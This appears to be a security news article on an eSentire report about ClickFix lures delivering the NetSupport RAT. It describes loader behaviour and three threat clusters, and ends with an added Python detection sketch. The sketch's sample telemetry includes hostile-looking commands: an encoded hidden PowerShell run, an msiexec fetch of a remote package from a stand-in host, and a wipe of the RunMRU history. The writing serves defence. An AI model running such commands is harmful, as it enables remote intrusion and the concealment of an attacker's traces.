ClickFix initial access page example | Image: eSentire Threat Response Unit (TRU)
eSentire’s Threat Response Unit (TRU) has exposed a major wave of malicious campaigns abusing the NetSupport Manager remote administration tool (RAT), attributed to three distinct threat groups. The report highlights how attackers have shifted their delivery methods in 2025, moving from traditional fake browser updates to the ClickFix social engineering technique, enabling remote access and data theft through weaponized PowerShell loaders.
The ClickFix method lures victims into executing malicious commands through the Windows Run prompt, using realistic “update” or “fix” pages. Once the user complies, “this action triggers the extraction and execution of NetSupport on the target system,” effectively granting attackers full remote access to the victim’s machine.
TRU identified multiple PowerShell-based loaders responsible for deploying NetSupport in these campaigns. These loaders are designed to bypass antivirus detection and establish persistence silently.
In one example, TRU described how a specific PowerShell-based loader drops and executes NetSupport, referencing a variant with SHA256 hash a823031ba57d0e5f7ef15d63fe93a05ed00eadfd19afc7d2fed60f20e651a8bb. The loader performs a series of hidden actions:
- Decodes a base64-encoded JSON blob containing payloads.
- Creates a hidden directory for the dropper files.
- Writes decoded payloads to disk.
- Establishes persistence via a Startup folder shortcut.
- Verifies all NetSupport configuration files are in place.
- Executes the NetSupport client (“client32.exe”).
TRU also documented a more advanced variant that deletes RunMRU registry entries to erase traces of user-executed commands, demonstrating an evolution toward stealthier operations.
While PowerShell remains the dominant loader, eSentire also observed attackers leveraging MSI installers, run through the built-in msiexec utility as a Living-off-the-Land binary (LOLBin), to execute NetSupport payloads.
One analyzed sample, d5b13eb9e8afb79b4d7830caf3ac746637e5bda1752962e5bd0aed3352cc4a42, used the Windows msiexec command to retrieve malicious installer packages from compromised domains. These installers executed base64-encoded PowerShell payloads, which then deobfuscated byte arrays to reconstruct additional malicious scripts in memory.
TRU noted that the final decoded stage sent HTTP requests with a Go-style user agent (“Go-http-client/1.2”), pulling and executing remote commands via Invoke-Expression (IEX).
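As an added example (not from the eSentire report), the Python sketch below turns the loader behaviours described above into simple detection rules and runs them over a handful of constructed telemetry records; the event schema, user names, paths and URLs are assumptions, and the placeholder Base64 stands in for whatever the real loader carries.

```python
import re

# Constructed sample telemetry for this example (invented, not from the TRU report):
# simplified process-creation, file-write and web-proxy records as a SIEM might emit.
SAMPLE_EVENTS = [
    {"kind": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc <BASE64_PLACEHOLDER>"},
    {"kind": "file", "path": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows"
                             r"\Start Menu\Programs\Startup\update.lnk"},
    {"kind": "process", "parent": "powershell.exe", "image": "client32.exe",
     "cmdline": r"C:\Users\alice\AppData\Roaming\.hidden\client32.exe"},
    {"kind": "process", "parent": "explorer.exe", "image": "msiexec.exe",
     "cmdline": "msiexec.exe /i http://example.invalid/setup.msi /qn"},
    {"kind": "process", "parent": "powershell.exe", "image": "reg.exe",
     "cmdline": r"reg delete HKCU\...\Explorer\RunMRU /va /f"},
    {"kind": "proxy", "user_agent": "Go-http-client/1.2", "url": "http://example.invalid/c"},
    {"kind": "process", "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

# Shortcut dropped into the per-user Startup folder (the persistence step in the report).
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)

def _cmd(e):
    return e.get("cmdline", "").lower()

# One predicate per behaviour the report attributes to the loaders.
RULES = {
    # ClickFix: the user pastes into the Run prompt, so explorer.exe is the parent.
    "clickfix_run_prompt_powershell": lambda e: e["kind"] == "process"
        and e["parent"] == "explorer.exe" and e["image"] == "powershell.exe"
        and ("-enc" in _cmd(e) or "hidden" in _cmd(e)),
    "startup_shortcut_persistence": lambda e: e["kind"] == "file"
        and bool(STARTUP_LNK.search(e["path"])),
    # client32.exe launched from a user profile, not an admin-installed location.
    "netsupport_client_in_user_profile": lambda e: e["kind"] == "process"
        and e["image"].lower() == "client32.exe" and "\\users\\" in _cmd(e),
    "msiexec_remote_package": lambda e: e["kind"] == "process"
        and e["image"].lower() == "msiexec.exe" and "http" in _cmd(e),
    "runmru_history_wiped": lambda e: "runmru" in _cmd(e)
        and any(k in _cmd(e) for k in ("delete", "remove")),
    "go_http_client_user_agent": lambda e: e["kind"] == "proxy"
        and e.get("user_agent") == "Go-http-client/1.2",
}

def detect(events):
    """Return (event_index, rule_name) pairs for every rule that fires."""
    return [(i, name) for i, ev in enumerate(events)
            for name, pred in RULES.items() if pred(ev)]
```

Each rule is weak on its own (msiexec fetching a remote package or a Startup .lnk both happen in benign IT work); the signal in the report is the whole chain landing on one host within minutes.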
Through traffic analysis, eSentire confirmed that all campaigns used NetSupport Connectivity Servers (Gateways) running version 1.92. The observed C2 traffic began with the POLL command, a characteristic handshake for the RAT’s control protocol.
The TRU team further clustered the activity into three separate threat groups, each distinguished by licensing data, infrastructure, and tactics.
Cluster 1: “EVALUSION” Campaign
The EVALUSION cluster is the most active and widespread. eSentire observed:
- Common license parameters such as “EVALUSION licensee, serial NSM165348, 5000 maxslaves” and “20sd typo in NSM.LIC”.
- Infrastructure distributed across Lithuania, Russia, Moldova, the UAE, the UK, and the United States.
- Use of both PowerShell- and curl-based loaders.
TRU assessed that EVALUSION deliberately spreads infrastructure across multiple countries and uses many variations of loaders, indicating a well-resourced and adaptive criminal operation.
Cluster 2: “FSHGDREE32/SGI” Campaign
A second cluster, FSHGDREE32/SGI, shares technical overlap with EVALUSION but uses distinct licensing keys and infrastructure.
- Identical RADIUSSecret values across samples.
- Related NetSupport client licenses issued in 2015 and 2017 with over 100,000 “maxslaves” (infected endpoints).
- Hosting primarily across Eastern Europe, including Russia, Moldova, Bulgaria, and the UK.
TRU highlighted the use of bulletproof hosting providers and shared nameservers (e.g., LUXHOST and MY-NDNS) to obscure attribution and extend uptime.
Cluster 3: “XMLCTL” Campaign
The third and most distinct campaign, XMLCTL, has been linked to UAC-0050, a threat actor previously documented by Proofpoint for targeting Ukrainian organizations using NetSupport.
Unlike the other clusters, XMLCTL uses MSI-based loaders and commercial U.S.-based infrastructure instead of bulletproof hosts. Its configuration also differs technically, using “SecurityKeyU” instead of RADIUSSecret and a non-standard port (1203).
This suggests a separate actor with different motivations or operational models, potentially blending espionage and cybercrime.
The NetSupport RAT, originally marketed as a legitimate remote administration and classroom management tool, continues to be weaponized by threat actors for covert access, data theft, and persistence.
TRU emphasizes that “this ongoing practice of leveraging legitimate remote administration tools for malicious purposes continues patterns documented in previous security advisories.”
By blending in with normal IT operations, NetSupport infections often go undetected, allowing adversaries to maintain long-term access to compromised environments.